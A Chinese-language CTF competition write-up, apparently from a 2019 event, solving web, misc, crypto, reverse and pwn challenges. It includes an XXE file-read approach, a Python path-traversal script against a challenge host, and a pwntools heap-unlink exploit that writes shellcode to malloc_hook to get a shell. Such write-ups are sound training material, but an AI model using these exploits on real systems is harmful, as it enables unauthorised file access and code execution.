2019網絡與信息安全專項賽題解

跟SUS_2019的大哥們一塊兒打的比賽，記錄一下

web

web1

       web簽到,像這種前端遊戲，通常邏輯都在js裏面因此直接看cqg.js,無腦賦值socre=15，出來flag

web2

     burp啓動，數據xml格式，猜想xxe，直接system讀文件，能夠讀到，那麼接下來讀取源碼試試，剛開始讀index.php沒讀到，得用php://filter僞協議去讀，路徑/var/www/html/index.php

web3

原本覺得是加密，試了半天不是，看起來文件任意讀取的地方參數像個base64的字符串，然而並非正常的base64，除了=等號不變，其它部分像是轉換了，因此就是一個簡單的base64移位轉換，因此直接上burp，intruder幾個不一樣名字的jpg，而後找到其轉換規則，直接讀取hint中提示的文件

```python #coding:utf-8

import requests as req import base64 as b64 import urllib #D4hpAXj= =>7.jpg=<Ny5qcGc=

#64個字符A-Z,a-z，0-9，+，/
 trans_box = {'+': 'u', '/': 'A', '1': '0','7': 'I', '9': 'k',  'K': '6', 'M': 'Z', 'O': '2', 'Q': '+','A': 'b', '3': 'C', '0': 'Y', '2': 'P', '4': 'y', '6': 'e', '8': 'v', 'B': 'z', 'D': 'N', 'F': 't', 'H': 'x', 'J': 'U', 'L': 'X', 'N': 'F', 'P': 'V', 'R': 'q', 'T': 'a', 'V': 'l', 'X': 'm', 'Z': 'S', 's': 'p', 'u': 's', 'w': 'O', 'y': 'D', 'E': '\\', 'b': '4', 'd': 'B', 'f': 'h', 'h': '5', 'j': 'c', 'l': 'M', 'n': '9', 'p': 'w', 'r': '1', 't': '8', 'v': 'o', 'x': 'i', 'z': 'K','=':'=', '5': 'T',  'C': 'J', 'G': '7', 'I': 'f', 'S': 'd', 'U': '3', 'W': 'R', 'Y': 'W', 'a': 'L', 'c': 'r', 'e': 'g', 'g': 'n', 'i': 'E', 'k': 'j', 'm': 'G', 'o': 'H', 'q': 'Q'} print len(trans_box.keys()) def get_key (dict, value): return [k for k, v in dict.items() if v == value] def zhuanhuan(b): payload=""

    for i in range(len(b)): payload = payload + get_key(trans_box,b[i])[0] return payload def exp(a): b = b64.b64encode(a) print b c = zhuanhuan(b) payload = urllib.quote(c) print payload res = req.get('http://743d9d231a084055b92ea11b480e47c545be52d430074b21.changame.ichunqiu.com/img.php?name={}'.format(payload)) print res.url print res.content if __name__ == '__main__': exp('../../../../../../var/www/html/templates/upload.html') #exp('../../../../../../proc/self/cwd/templates/upload.html')

    #exp('../../../../../../root/flag.txt')
 ```

Misc

misc1

       簽到，直接看到TXT，直接反查域名的TXT記錄便可獲得flag，

http://dbcha.com/?t=1565832996

misc2

       win上下載後直接拖到最後發現密碼，而後打開壓縮包獲得一張圖片，繼續打開它

 

發現有一段奇怪的文字，百度了一下

 

0ox！加密，找了個在線揭祕網站進行解密便可獲得flag

https://www.splitbrain.org/services/ook

misc3

是張圖片，binwalk分離，獲得一個加密的壓縮包，嘗試爆破無果，

回來看第一張圖片，學弟見過這種編碼，核心價值觀編碼。。。。，直接在線解碼獲得壓縮包密碼http://ctf.ssleye.com/cvencode.html

獲得壓縮包密碼爲CodeValues，而後出來一張圖片

藏了一個二維碼，百度了一下這種datamatric二維碼也能夠直接解碼，先用steglove轉爲黑白圖，而後截圖二維碼這一部分，而後用win畫圖工具擦掉旁邊多餘的部分就能夠解碼了

misc4

下載壓縮包，解壓獲得一個 七代目.gif。沒法正常打開，用010editor看一眼，是png的文件頭。

那就直接根據文件後綴修改，把89504E47改爲gif的47494638，gif即被修復。而後找個在線網站，分解一下這個gif https://tu.sioe.cn/gj/fenjie/。

這麼多圖，一個個分析確定累死人。題目名字七代目，那就直接把第七張圖掏出來看。Binwalk什麼的走一遍感受已經沒有藏得私貨了，用stegsolve打開看一下LSB。結果剛打開調一下就出flag了

Crypto

crypto1

題目說sm4加密，直接百度

github下載安裝gmssl，直接解密便可

crypto2

題目中給了RSA算法中的e，n，dp，c，其中。想到以前看過的一葉飄零的blog（https://zhuanlan.zhihu.com/p/43033684）關於dp和dq的解法，改一下數據就能夠獲得最終結果，payload以下：

而後獲得16進制字符串在線解碼就獲得flag

Re

Re1

控制流平坦化，拿工具跑一下，前幾個check驗證了flag的格式，最後一個check將輸入進行變化和特定的字符串比較。 ABCDEFGHIJ的話就加上48，若是是-就不變化，其餘的減去17 s3 = [ 'J', '2', '2', '6', '1', 'C', '6', '3', '-', '3', 'I', '2', 'I', '-', 'E', 'G', 'E', '4', '-', 'I', 'B', 'C', 'C', '-', 'I', 'E', '4', '1', 'A', '5', 'I', '5', 'F', '4', 'H', 'B'] s3 = "".join(s3) f = ""
for i in range(len(s3)): m = s3[i] q1 = chr(ord(m) - 17） q2 = chr(ord(m) + 48) if m == "-": f += "-"

    elif m in "ABCDEFGHIJ": f += q1 else: f += q2 print f

RE2

稍微看一下就能知道

前面的計算是算平方數

後面的計算是算10000內素數的個數

Pwn

Pwn1

在Edit的時候可以，讓size多出一字節，而後就能夠Unlink了，保護全關，靜態連接，能夠寫shellcode到malloc_hook

 

from pwn import *

from time import sleep import base64 context.log_level = 'debug' context.arch = 'i386' p = process("./pwn") f = "" n = "\n"

def Add(size, con): global f p.sendline("1") p.sendline(str(size)) p.sendline(con) f += "1" + n + str(size) + n + con + n def Del(idx): global f p.sendline("2") p.sendline(str(idx)) f += "2" + n + str(idx) + n def Edit(idx, con): global f p.sendline("3") p.sendline(str(idx)) p.sendline(con) f += "3" + n + str(idx) + n + con + n f = "" note_size = 0x80eba00 note_ptr = 0x80eba40 sc = asm(shellcraft.i386.linux.sh()) malloc_hook = 0x80ea4d8 Add(0x64, "0" * 0x64) Add(0x64, "0" * 0x64) Add(0x64, "0" * 0x64) Add(0x64, "0" * 0x64) Add(0x68, "0" * 0x68) Add(0x64, "0" * 0x64) _id = 3 Edit(_id, "0" * 0x65) ptr = note_ptr + 4 * _id fake_fd = ptr - 12 fake_bk = ptr - 8 fake = p32(1) + p32(0x61) fake += p32(fake_fd) + p32(fake_bk) fake = fake.ljust(0x60, chr(0x60)) fake += p32(0x60) fake += "\x70\x00" bss_end = 0x80ebe0b Edit(_id, fake) # raw_input()
 Del(_id + 1) Edit(_id, p32(malloc_hook)) Edit(_id, p32(malloc_hook) + p32(bss_end)) Edit(0, p32(bss_end)) Edit(1, sc) Add(0x64, 'cat flag') print base64.b64encode(f) p.interactive()

 

原文出處：https://www.cnblogs.com/tr1ple/p/11366191.html